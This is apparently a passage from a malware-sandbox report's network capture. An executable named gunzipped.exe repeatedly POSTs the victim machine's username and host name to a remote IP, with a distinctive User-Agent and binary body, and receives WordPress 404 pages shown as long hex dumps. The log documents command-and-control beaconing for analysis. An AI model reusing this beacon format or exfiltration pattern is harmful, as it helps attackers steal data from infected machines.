                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:37.026061058 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:37.026099920 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:37.026138067 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:37.026180983 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:37.026217937 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:37.026257992 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:37.026294947 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:37.026333094 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:37.026376963 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          69192.168.2.549783136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:37.366004944 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:37.573782921 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:38.553556919 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:37 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:38.553602934 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:38.553639889 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:38.553678036 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:38.553721905 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:38.553761005 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:38.553797960 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:38.553836107 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:38.553874016 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:38.553911924 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          70192.168.2.549784136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:38.899573088 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:39.102776051 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:40.071350098 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:38 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 